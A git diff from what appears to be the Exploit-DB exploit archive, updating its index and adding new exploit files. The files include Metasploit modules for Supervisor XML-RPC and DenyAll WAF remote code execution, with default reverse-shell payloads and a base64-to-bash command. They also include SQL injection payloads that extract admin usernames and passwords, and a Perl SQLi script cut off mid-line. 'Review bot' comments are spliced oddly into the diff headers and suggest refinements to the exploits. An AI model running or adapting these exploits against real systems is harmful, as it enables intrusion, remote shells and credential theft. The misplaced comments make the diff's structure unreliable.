 38450,platforms/php/webapps/38450.txt,"Kerio Control 8.6.1 - Multiple Vulnerabilities",2015-10-13,"Raschin Tavakoli",php,webapps,0
 38455,platforms/hardware/webapps/38455.txt,"ZYXEL PMG5318-B20A - OS Command Injection",2015-10-14,"Karn Ganeshen",hardware,webapps,0
 38476,platforms/php/webapps/38476.txt,"Todoo Forum 2.0 - todooforum.php Multiple Parameter Cross-Site Scripting",2013-04-14,"Chiekh Bouchenafa",php,webapps,0
@@ -36657,7 +36661,7 @@ id,file,description,date,author,platform,type,port
 38482,platforms/php/webapps/38482.txt,"Crafty Syntax Live Help 3.1.2 - Remote File Inclusion / Full Path Disclosure",2013-04-19,ITTIHACK,php,webapps,0
 38484,platforms/php/webapps/38484.rb,"WordPress Plugin Ajax Load More < 2.8.2 - Arbitrary File Upload",2015-10-18,PizzaHatHacker,php,webapps,0
 38487,platforms/php/webapps/38487.txt,"WordPress Theme Colormix - Multiple Vulnerabilities",2013-04-21,MustLive,php,webapps,0
-38488,platforms/hardware/webapps/38488.txt,"Belkin Router N150 1.00.08/1.00.09 - Directory Traversal",2015-10-19,"Rahul Pratap Singh",hardware,webapps,0
+38488,platforms/hardware/webapps/38488.txt,"Belkin N150 Router 1.00.08/1.00.09 - Directory Traversal",2015-10-19,"Rahul Pratap Singh",hardware,webapps,0
 38491,platforms/php/webapps/38491.php,"SMF - 'index.php' HTML Injection / Multiple PHP Code Injection Vulnerabilities",2013-04-23,"Jakub Galczyk",php,webapps,0
 38494,platforms/php/webapps/38494.txt,"WordPress Plugin WP Super Cache - PHP Remote Code Execution",2013-04-24,anonymous,php,webapps,0
 38496,platforms/php/webapps/38496.txt,"RealtyScript 4.0.2 - Multiple Cross-Site Request Forgery / Persistent Cross-Site Scripting Vulnerabilities",2015-10-19,LiquidWorm,php,webapps,0
@@ -36740,7 +36744,7 @@ id,file,description,date,author,platform,type,port
 38646,platforms/jsp/webapps/38646.txt,"NXFilter 3.0.3 - Multiple Cross-Site Scripting Vulnerabilities",2015-11-06,hyp3rlinx,jsp,webapps,0
 38648,platforms/php/webapps/38648.txt,"WordPress Plugin My Calendar 2.4.10 - Multiple Vulnerabilities",2015-11-06,Mysticism,php,webapps,0
 38649,platforms/php/webapps/38649.txt,"Google AdWords API PHP client library 6.2.0 - Arbitrary PHP Code Execution",2015-11-07,"Dawid Golunski",php,webapps,0
-38651,platforms/php/webapps/38651.txt,"eBay Magento CE 1.9.2.1 - Unrestricted Cron Script (Potential Code Execution / Denial of Service)",2015-11-07,"Dawid Golunski",php,webapps,0
+38651,platforms/php/webapps/38651.txt,"eBay Magento CE 1.9.2.1 - Unrestricted Cron Script (Code Execution / Denial of Service)",2015-11-07,"Dawid Golunski",php,webapps,0
 38652,platforms/php/webapps/38652.txt,"Google AdWords 6.2.0 API client libraries - XML eXternal Entity Injection (XXE)",2015-11-07,"Dawid Golunski",php,webapps,0
 38653,platforms/asp/webapps/38653.txt,"Corda Highwire - 'Highwire.ashx' Full Path Disclosure",2013-07-12,"Adam Willard",asp,webapps,0
 38654,platforms/php/webapps/38654.txt,"OpenEMR 4.1 - 'note' Parameter HTML Injection",2013-07-12,"Nate Drier",php,webapps,0
@@ -36825,7 +36829,7 @@ id,file,description,date,author,platform,type,port
 38828,platforms/php/webapps/38828.php,"Limonade Framework - 'limonade.php' Local File Disclosure",2013-11-17,"Yashar shahinzadeh",php,webapps,0
 38830,platforms/php/webapps/38830.txt,"MyCustomers CMS 1.3.873 - SQL Injection",2015-11-30,"Persian Hack Team",php,webapps,80
 38833,platforms/linux/webapps/38833.txt,"Kodi 15 - Arbitrary File Access (Web Interface)",2015-12-01,"Machiel Pronk",linux,webapps,0
-38840,platforms/hardware/webapps/38840.txt,"Belkin N150 Wireless Home Router F9K1009 v1 - Multiple Vulnerabilities",2015-12-01,"Rahul Pratap Singh",hardware,webapps,80
+38840,platforms/hardware/webapps/38840.txt,"Belkin N150 Wireless Router F9K1009 v1 - Multiple Vulnerabilities",2015-12-01,"Rahul Pratap Singh",hardware,webapps,80
 38841,platforms/php/webapps/38841.txt,"ZenPhoto 1.4.10 - Local File Inclusion",2015-12-01,hyp3rlinx,php,webapps,80
 38842,platforms/php/webapps/38842.txt,"Testa OTMS - Multiple SQL Injections",2013-11-13,"Ashiyane Digital Security Team",php,webapps,0
 38843,platforms/php/webapps/38843.txt,"TomatoCart 1.1.8.2 - 'class' Parameter Local File Inclusion",2013-11-18,Esac,php,webapps,0
@@ -37109,7 +37113,7 @@ id,file,description,date,author,platform,type,port
 39352,platforms/php/webapps/39352.txt,"Fonality trixbox - 'index.php' Remote Code Execution",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0
 39354,platforms/php/webapps/39354.pl,"Ramui Forum Script 9.0 - SQL Injection",2016-01-28,bd0rk,php,webapps,80
 39355,platforms/php/webapps/39355.txt,"Ramui Web Hosting Directory Script 4.0 - Remote File Inclusion",2016-01-28,bd0rk,php,webapps,80
-39356,platforms/hardware/webapps/39356.py,"Netgear WNR1000v4 - Authentication Bypass",2016-01-28,"Daniel Haake",hardware,webapps,80
+39356,platforms/hardware/webapps/39356.py,"NETGEAR WNR1000v4 - Authentication Bypass",2016-01-28,"Daniel Haake",hardware,webapps,80
 39382,platforms/multiple/webapps/39382.txt,"SAP HANA 1.00.095 - hdbindexserver Memory Corruption",2016-01-28,ERPScan,multiple,webapps,0
 39384,platforms/php/webapps/39384.txt,"WordPress Plugin Simple Add Pages or Posts 1.6 - Cross-Site Request Forgery",2016-01-29,ALIREZA_PROMIS,php,webapps,0
 39385,platforms/php/webapps/39385.txt,"ProjectSend r582 - Multiple Vulnerabilities",2016-01-29,"Filippo Cavallarin",php,webapps,80
@@ -37125,7 +37129,7 @@ id,file,description,date,author,platform,type,port
 39409,platforms/hardware/webapps/39409.txt,"D-Link DVG­N5402SP - Multiple Vulnerabilities",2016-02-04,"Karn Ganeshen",hardware,webapps,0
 39410,platforms/php/webapps/39410.txt,"WordPress Plugin User Meta Manager 3.4.6 - Blind SQL Injection",2016-02-04,"Panagiotis Vagenas",php,webapps,80
 39411,platforms/php/webapps/39411.txt,"WordPress Plugin User Meta Manager 3.4.6 - Privilege Escalation",2016-02-04,"Panagiotis Vagenas",php,webapps,80
-39412,platforms/hardware/webapps/39412.txt,"Netgear ProSafe Network Management System NMS300 - Multiple Vulnerabilities",2016-02-04,"Pedro Ribeiro",hardware,webapps,0
+39412,platforms/hardware/webapps/39412.txt,"NETGEAR NMS300 ProSafe Network Management System - Multiple Vulnerabilities",2016-02-04,"Pedro Ribeiro",hardware,webapps,0
 39413,platforms/php/webapps/39413.txt,"UliCMS v9.8.1 - SQL Injection",2016-02-04,"Manuel García Cárdenas",php,webapps,80
 39414,platforms/php/webapps/39414.txt,"OpenDocMan 1.3.4 - Cross-Site Request Forgery",2016-02-04,"Curesec Research Team",php,webapps,80
 39415,platforms/php/webapps/39415.txt,"ATutor 2.2 - Multiple Cross-Site Scripting Vulnerabilities",2016-02-04,"Curesec Research Team",php,webapps,80
@@ -37609,8 +37613,8 @@ id,file,description,date,author,platform,type,port
 40856,platforms/hardware/webapps/40856.txt,"Xfinity Gateway - Remote Code Execution",2016-12-02,"Gregory Smiley",hardware,webapps,0
 40877,platforms/php/webapps/40877.txt,"AbanteCart 1.2.7 - Cross-Site Scripting",2016-12-06,"Kacper Szurek",php,webapps,0
 40887,platforms/hardware/webapps/40887.txt,"Cisco Unified Communications Manager 7/8/9 - Directory Traversal",2016-12-07,justpentest,hardware,webapps,0
-40889,platforms/cgi/webapps/40889.txt,"Netgear R7000 - Command Injection",2016-12-07,Acew0rm,cgi,webapps,0
-40898,platforms/hardware/webapps/40898.txt,"Netgear R7000 - Cross-Site Scripting",2016-12-11,"Vincent Yiu",hardware,webapps,0
+40889,platforms/cgi/webapps/40889.txt,"NETGEAR R7000 - Command Injection",2016-12-07,Acew0rm,cgi,webapps,0
+40898,platforms/hardware/webapps/40898.txt,"NETGEAR R7000 - Cross-Site Scripting",2016-12-11,"Vincent Yiu",hardware,webapps,0
 40901,platforms/hardware/webapps/40901.txt,"ARG-W4 ADSL Router - Multiple Vulnerabilities",2016-12-11,"Persian Hack Team",hardware,webapps,0
 40904,platforms/php/webapps/40904.txt,"Smart Guard Network Manager 6.3.2 - SQL Injection",2016-12-03,"Rahul Raz",php,webapps,0
 40908,platforms/php/webapps/40908.html,"WordPress Plugin Multisite Post Duplicator 0.9.5.1 - Cross-Site Request Forgery",2016-12-12,dxw,php,webapps,80
@@ -37926,7 +37930,7 @@ id,file,description,date,author,platform,type,port
 41399,platforms/php/webapps/41399.txt,"Joomla! Component MaQma Helpdesk 4.2.7 - 'id' Parameter SQL Injection",2017-02-20,"Ihsan Sencan",php,webapps,0
 41400,platforms/php/webapps/41400.txt,"Joomla! Component PayPal IPN for DOCman 3.1 - 'id' Parameter SQL Injection",2017-02-20,"Ihsan Sencan",php,webapps,0
 41401,platforms/ios/webapps/41401.txt,"Album Lock 4.0 iOS - Directory Traversal",2017-02-20,Vulnerability-Lab,ios,webapps,0
-41402,platforms/hardware/webapps/41402.txt,"Tenda N3 Wireless N150 Home Router - Authentication Bypass",2015-09-03,"Mandeep Jadon",hardware,webapps,0
+41402,platforms/hardware/webapps/41402.txt,"Tenda N3 Wireless N150 Router - Authentication Bypass",2015-09-03,"Mandeep Jadon",hardware,webapps,0
 41595,platforms/php/webapps/41595.txt,"Car Workshop System - SQL Injection",2017-03-13,"Ihsan Sencan",php,webapps,0
 41404,platforms/hardware/webapps/41404.html,"DIGISOL DG-HR1400 Wireless Router - Cross-Site Request Forgery",2017-02-21,Indrajith.A.N,hardware,webapps,0
 41405,platforms/php/webapps/41405.txt,"Joomla! Component J-HotelPortal 6.0.2 - 'review_id' Parameter SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0
@@ -38545,3 +38549,11 @@ id,file,description,date,author,platform,type,port
 42755,platforms/php/webapps/42755.txt,"Tecnovision DLX Spot - Arbitrary File Upload",2017-05-19,"Simon Brannstrom",php,webapps,0
 42761,platforms/php/webapps/42761.txt,"PHPMyFAQ 2.9.8 - Cross-Site Scripting",2017-09-21,"Ishaq Mohammed",php,webapps,0
 42768,platforms/php/webapps/42768.pl,"Stock Photo Selling 1.0 - SQL Injection",2017-09-22,"Ihsan Sencan",php,webapps,0
+42769,platforms/linux/webapps/42769.rb,"DenyAll WAF < 6.3.0 - Remote Code Execution (Metasploit)",2017-09-19,"Mehmet Ince",linux,webapps,0
+42770,platforms/php/webapps/42770.txt,"Lending And Borrowing - 'pid' Parameter SQL Injection",2017-09-22,"Ihsan Sencan",php,webapps,0
+42771,platforms/php/webapps/42771.txt,"Multi Level Marketing - SQL Injection",2017-09-22,"Ihsan Sencan",php,webapps,0
+42772,platforms/php/webapps/42772.pl,"Cash Back Comparison Script 1.0 - SQL Injection",2017-09-22,"Ihsan Sencan",php,webapps,0
+42773,platforms/php/webapps/42773.txt,"Claydip Airbnb Clone 1.0 - Arbitrary File Upload",2017-09-22,"Ihsan Sencan",php,webapps,0
+42774,platforms/php/webapps/42774.txt,"Secure E-commerce Script 1.02 - 'sid' Parameter SQL Injection",2017-09-22,8bitsec,php,webapps,0
+42775,platforms/php/webapps/42775.txt,"PHP Auction Ecommerce Script 1.6 - SQL Injection",2017-09-22,8bitsec,php,webapps,0
+42776,platforms/asp/webapps/42776.txt,"JitBit HelpDesk < 9.0.2 - Authentication Bypass",2017-09-22,Kc57,asp,webapps,0
diff --git a/platforms/asp/webapps/42776.txt b/platforms/asp/webapps/42776.txt
new file mode 100755
index 000000000..a1fd26535
--- /dev/null
+++ b/platforms/asp/webapps/42776.txt
@@ -0,0 +1,13 @@
+# Exploit Title: JitBit HelpDesk <= 9.0.2 Broken Authentication
+# Google Dork: "Powered by Jitbit HelpDesk" -site:jitbit.com
+# Date: 09/22/2017
+# Exploit Author: Rob Simon (Kc57) - TrustedSec www.trustedsec.com
+# Vendor Homepage: https://www.jitbit.com/helpdesk/
+# Download Link: https://static.jitbit.com/HelpDeskTrial.zip
+# Version: 9.0.2
+# Tested on: Windows Server 2012
+# CVE : NA
+
+Proof of Concept:
+
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42776.zip
\ No newline at end of file
diff --git a/platforms/linux/remote/42779.rb b/platforms/linux/remote/42779.rb
new file mode 100755
index 000000000..68f9aee33
--- /dev/null
+++ b/platforms/linux/remote/42779.rb
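Review bot: The affected range is stated two ways for this entry: the header here gives `JitBit HelpDesk <= 9.0.2` with `Version: 9.0.2`, while the index row added to files.csv for the same id reads `JitBit HelpDesk < 9.0.2 - Authentication Bypass`, which excludes 9.0.2. Someone triaging their own install cannot tell from the commit whether 9.0.2 itself is affected, so the two should agree; if the header is the accurate one, the index title would be `JitBit HelpDesk <= 9.0.2 - Authentication Bypass`. The entry also carries no description of the flaw or of a fixed release, only a link to an external archive, so a one-line summary and the first fixed version (if known) would make it usable for patch decisions.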
@@ -0,0 +1,169 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::CmdStager
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "Supervisor XML-RPC Authenticated Remote Code Execution",
+ 'Description' => %q{
+ This module exploits a vulnerability in the Supervisor process control software, where an authenticated client
+ can send a malicious XML-RPC request to supervisord that will run arbitrary shell commands on the server.
+ The commands will be run as the same user as supervisord. Depending on how supervisord has been configured, this
+ may be root. This vulnerability can only be exploited by an authenticated client, or if supervisord has been
+ configured to run an HTTP server without authentication. This vulnerability affects versions 3.0a1 to 3.3.2.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Calum Hutton '
+ ],
+ 'References' =>
+ [
+ ['URL', 'https://github.com/Supervisor/supervisor/issues/964'],
+ ['URL', 'https://www.debian.org/security/2017/dsa-3942'],
+ ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11610'],
+ ['URL', 'https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610'],
+ ['CVE', '2017-11610']
+ ],
+ 'Platform' => 'linux',
+ 'Targets' =>
+ [
+ ['3.0a1-3.3.2', {}]
+ ],
+ 'Arch' => [ ARCH_X86, ARCH_X64 ],
+ 'DefaultOptions' =>
+ {
+ 'RPORT' => 9001,
+ 'Payload' => 'linux/x64/meterpreter/reverse_tcp',
+ },
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Jul 19 2017',
+ 'DefaultTarget' => 0
+ ))
+
+ register_options(
+ [
+ Opt::RPORT(9001),
+ OptString.new('HttpUsername', [false, 'Username for HTTP basic auth']),
+ OptString.new('HttpPassword', [false, 'Password for HTTP basic auth']),
+ OptString.new('TARGETURI', [true, 'The path to the XML-RPC endpoint', '/RPC2']),
+ ]
+ )
+ end
+
+ def check_version(version)
+ if version <= Gem::Version.new('3.3.2') and version >= Gem::Version.new('3.0a1')
+ return true
+ else
+ return false
+ end
+ end
+
+ def check
+
+ print_status('Extracting version from web interface..')
+
+ params = {
+ 'method' => 'GET',
+ 'uri' => normalize_uri('/')
+ }
+ if !datastore['HttpUsername'].to_s.empty? and !datastore['HttpPassword'].to_s.empty?
+ print_status("Using basic auth (#{datastore['HttpUsername']}:#{datastore['HttpPassword']})")
+ params.merge!({'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])})
+ end
+ res = send_request_cgi(params)
+
+ if res
+ if res.code == 200
+ match = res.body.match(/(\d+\.[\dab]\.\d+)<\/span>/)
+ if match
+ version = Gem::Version.new(match[1])
+ if check_version(version)
+ print_good("Vulnerable version found: #{version}")
+ return Exploit::CheckCode::Appears
+ else
+ print_bad("Version #{version} is not vulnerable")
+ return Exploit::CheckCode::Safe
+ end
+ else
+ print_bad('Could not extract version number from web interface')
+ return Exploit::CheckCode::Unknown
+ end
+ elsif res.code == 401
+ print_bad("Authentication failed: #{res.code} response")
+ return Exploit::CheckCode::Safe
+ else
+ print_bad("Unexpected HTTP code: #{res.code} response")
+ return Exploit::CheckCode::Unknown
+ end
+ else
+ print_bad('Error connecting to web interface')
+ return Exploit::CheckCode::Unknown
+ end
+
+ end
+
+ def execute_command(cmd, opts = {})
+
+ # XML-RPC payload template, use nohup and & to detach and background the process so it doesnt hangup the web server
+ # Credit to the following urls for the os.system() payload
+ # https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610
+ # https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html
+ xml_payload = %{
+
+ supervisor.supervisord.options.warnings.linecache.os.system
+
+
+ echo -n #{Rex::Text.encode_base64(cmd)}|base64 -d|nohup bash > /dev/null 2>&1 &
+
+
+}
+
+ # Send the XML-RPC payload via POST to the specified endpoint
+ endpoint_path = target_uri.path
+ print_status("Sending XML-RPC payload via POST to #{peer}#{datastore['TARGETURI']}")
+
+ params = {
+ 'method' => 'POST',
+ 'uri' => normalize_uri(endpoint_path),
+ 'ctype' => 'text/xml',
+ 'headers' => {'Accept' => 'text/xml'},
+ 'data' => xml_payload,
+ 'encode_params' => false
+ }
+ if !datastore['HttpUsername'].to_s.empty? and !datastore['HttpPassword'].to_s.empty?
+ print_status("Using basic auth (#{datastore['HttpUsername']}:#{datastore['HttpPassword']})")
+ params.merge!({'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])})
+ end
+ return send_request_cgi(params, timeout=5)
+
+ end
+
+ def exploit
+
+ res = execute_cmdstager(:linemax => 800)
+
+ if res
+ if res.code == 401
+ fail_with(Failure::NoAccess, "Authentication failed: #{res.code} response")
+ elsif res.code == 404
+ fail_with(Failure::NotFound, "Invalid XML-RPC endpoint: #{res.code} response")
+ else
+ fail_with(Failure::UnexpectedReply, "Unexpected HTTP code: #{res.code} response")
+ end
+ else
+ print_good('Request returned without status code, usually indicates success. Passing to handler..')
+ handler
+ end
+
+ end
+
+end
\ No newline at end of file
diff --git a/platforms/linux/webapps/42769.rb b/platforms/linux/webapps/42769.rb
new file mode 100755
index 000000000..a43ad8f9a
--- /dev/null
+++ b/platforms/linux/webapps/42769.rb
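Review bot: Both `check` and `execute_command` in 42779.rb print the HTTP basic-auth password in cleartext via `print_status("Using basic auth (#{datastore['HttpUsername']}:#{datastore['HttpPassword']})")`, so the credential lands in console scrollback and in any log that captures module output; printing the username alone, `print_status("Using basic auth as #{datastore['HttpUsername']}")`, keeps the trace without the secret. Separately, the `elsif res.code == 401` branch of `check` returns `Exploit::CheckCode::Safe`, although a rejected login says nothing about the installed version; `Exploit::CheckCode::Unknown` there would avoid reporting an unassessed host as not vulnerable. In `execute_command`, `send_request_cgi(params, timeout=5)` assigns a local named `timeout` and passes 5 positionally, so `send_request_cgi(params, 5)` does the same without reading like a keyword argument.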
@@ -0,0 +1,103 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "DenyAll Web Application Firewall Remote Code Execution",
+ 'Description' => %q{
+ This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated users can execute a
+ terminal command under the context of the web server user.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Mehmet Ince ' # author & msf module
+ ],
+ 'References' =>
+ [
+ ['URL', 'https://pentest.blog/advisory-denyall-web-application-firewall-unauthenticated-remote-code-execution/']
+ ],
+ 'DefaultOptions' =>
+ {
+ 'SSL' => true,
+ 'RPORT' => 3001,
+ 'Payload' => 'python/meterpreter/reverse_tcp'
+ },
+ 'Platform' => ['python'],
+ 'Arch' => ARCH_PYTHON,
+ 'Targets' => [[ 'Automatic', { }]],
+ 'Privileged' => false,
+ 'DisclosureDate' => "Sep 19 2017",
+ 'DefaultTarget' => 0
+ ))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The URI of the vulnerable DenyAll WAF', '/'])
+ ]
+ )
+ end
+
+ def get_token
+ # Taking token by exploiting bug on first endpoint.
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'webservices', 'download', 'index.php'),
+ 'vars_get' => {
+ 'applianceUid' => 'LOCALUID',
+ 'typeOf' => 'debug'
+ }
+ })
+
+ if res && res.code == 200 && res.body.include?("iToken")
+ res.body.scan(/"iToken";s:32:"([a-z][a-f0-9]{31})";/).flatten[0]
+ else
+ nil
+ end
+ end
+
+ def check
+ # If we've managed to get token, that means target is most likely vulnerable.
+ token = get_token
+ if token.nil?
+ Exploit::CheckCode::Safe
+ else
+ Exploit::CheckCode::Appears
+ end
+ end
+
+ def exploit
+ # Get iToken from unauthenticated accessible endpoint
+ print_status('Extracting iToken value')
+ token = get_token
+
+ if token.nil?
+ fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
+ else
+ print_good("Awesome. iToken value = #{token}")
+ end
+
+ # Accessing to the vulnerable second endpoint where we have command injection with valid iToken
+ print_status('Trigerring command injection vulnerability with iToken value.')
+ r = rand_text_alpha(5 + rand(3));
+
+ send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'webservices', 'stream', 'tail.php'),
+ 'vars_post' => {
+ 'iToken' => token,
+ 'tag' => 'tunnel',
+ 'stime' => r,
+ 'type' => "#{r}$(python -c \"#{payload.encoded}\")"
+ }
+ })
+
+ end
+end
diff --git a/platforms/php/webapps/42761.txt b/platforms/php/webapps/42761.txt
index af517c350..c6d232cb6 100755
--- a/platforms/php/webapps/42761.txt
+++ b/platforms/php/webapps/42761.txt
@@ -33,6 +33,5 @@ Steps to Reproduce:
 3. Solution:
-The issue is now patched by the vendor
-https://github.com/thorsten/phpMyFAQ/commit/30b0025e19bd95ba28f4eff4d259671e7bb6bb86
+This vulnerability will be fixed in phpMyFAQ 2.9.9
diff --git a/platforms/php/webapps/42770.txt b/platforms/php/webapps/42770.txt
new file mode 100755
index 000000000..ef85b4048
--- /dev/null
+++ b/platforms/php/webapps/42770.txt
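Review bot: `check` in 42769.rb reports `Exploit::CheckCode::Safe` whenever `get_token` returns nil, but `get_token` returns nil both when the body lacks `iToken` and when `send_request_cgi` gets no response or a non-200 status, so an unreachable or erroring appliance is reported as not vulnerable. Returning `Exploit::CheckCode::Unknown` in the `token.nil?` branch avoids that false all-clear; the same conflation makes `exploit` raise `Failure::NotVulnerable` on what may only be a connection problem. The `Description` also omits the affected range even though the index row for this module reads `DenyAll WAF < 6.3.0`; stating "versions before 6.3.0" there would let a reader match the module against an installed appliance.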
@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: Lending And Borrowing Script - SQL Injection
+# Dork: N/A
+# Date: 22.09.2017
+# Vendor Homepage: http://www.i-netsolution.com/
+# Software Link: http://www.i-netsolution.com/product/lending-borrowing-script/
+# Demo: http://74.124.215.220/~realfund/
+# Version: N/A
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/single-cause.php?pid=[SQL]
+#
+# -22'++/*!00002UNION*/(/*!00002SELECT*/+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,(/*!00002SELECT*/+GROUP_CONCAT(0x557365726e616d653a,username,0x506173733a,password+SEPARATOR+0x3c62723e)+FROM+admin),0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x28333429,0x28333529,0x28333629,0x28333729,0x28333829,0x28333929,0x28343029,0x28343129,0x28343229,0x28343329,0x28343429,0x28343529,0x28343629,0x28343729)--+-
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42771.txt b/platforms/php/webapps/42771.txt
new file mode 100755
index 000000000..bccecc703
--- /dev/null
+++ b/platforms/php/webapps/42771.txt
@@ -0,0 +1,30 @@
+# # # # #
+# Exploit Title: Multi Level Marketing Script - SQL Injection
+# Dork: N/A
+# Date: 22.09.2017
+# Vendor Homepage: http://www.i-netsolution.com/
+# Software Link: http://www.i-netsolution.com/product/multi-level-marketing-script/
+# Demo: http://74.124.215.220/~advaemlm/
+# Version: N/A
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/service_detail.php?pid=[SQL]
+#
+# -8'++/*!00002UNION*/+/*!00002ALL*/+/*!00002SELECT*/+0x31,0x494853414e2053454e43414e,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x307833313330,0x3131,(/*!00002SELECT*/+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+/*!00002FROM*/+INFORMATION_SCHEMA.TABLES+/*!00002WHERE*/+TABLE_SCHEMA=DATABASE()),0x3133,0x3134,0x3135,0x3136,0x3137--+-
+#
+# http://localhost/[PATH]/news_detail.php?newid=[SQL]
+# http://localhost/[PATH]/event_detail.php?eventid=[SQL]
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42772.pl b/platforms/php/webapps/42772.pl
new file mode 100755
index 000000000..096dbd118
--- /dev/null
+++ b/platforms/php/webapps/42772.pl
@@ -0,0 +1,59 @@ +#!/usr/bin/perl -w +# # # # # +# Exploit Title: Cash Back Comparison Script 1.0 - SQL Injection +# Dork: N/A +# Date: 22.09.2017 +# Vendor Homepage: http://cashbackcomparisonscript.com/ +# Software Link: http://cashbackcomparisonscript.com/demo/features/ +# Demo: http://www.cashbackcomparison.info/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2017-14703 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +sub clear{ +system(($^O eq 'MSWin32') ? 'cls' : 'clear'); } +clear(); +print " +################################################################################ + #### ## ## ###### ### ## ## + ## ## ## ## ## ## ## ### ## + ## ## ## ## ## ## #### ## + ## ######### ###### ## ## ## ## ## + ## ## ## ## ######### ## #### + ## ## ## ## ## ## ## ## ### + #### ## ## ###### ## ## ## ## + + ###### ######## ## ## ###### ### ## ## + ## ## ## ### ## ## ## ## ## ### ## + ## ## #### ## ## ## ## #### ## + ###### ###### ## ## ## ## ## ## ## ## ## + ## ## ## #### ## ######### ## #### + ## ## ## ## ### ## ## ## ## ## ### + ###### ######## ## ## ###### ## ## ## ## + Cash Back Comparison Script 1.0 - SQL Injection +################################################################################ +"; +use LWP::UserAgent; +print "\nInsert Target:[http://site.com/path/]: "; +chomp(my $target=); +print "\n[!] Exploiting Progress.....\n"; +print "\n"; +$cc="/*!01116concat*/(0x3c74657874617265613e,0x557365726e616d653a,username,0x20,0x506173733a,password,0x3c2f74657874617265613e)"; +$tt="users"; +$b = LWP::UserAgent->new() or die "Could not initialize browser\n"; +$b->agent('Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0'); +$host = $target . 
"search/EfE'+/*!01116UNIoN*/+/*!01116SeLecT*/+0x31,0x32,0x33,0x34,0x35,0x36,".$cc.",0x38/*!50000FrOm*/".$tt."--+-.html"; +$res = $b->request(HTTP::Request->new(GET=>$host)); +$answer = $res->content; if ($answer =~/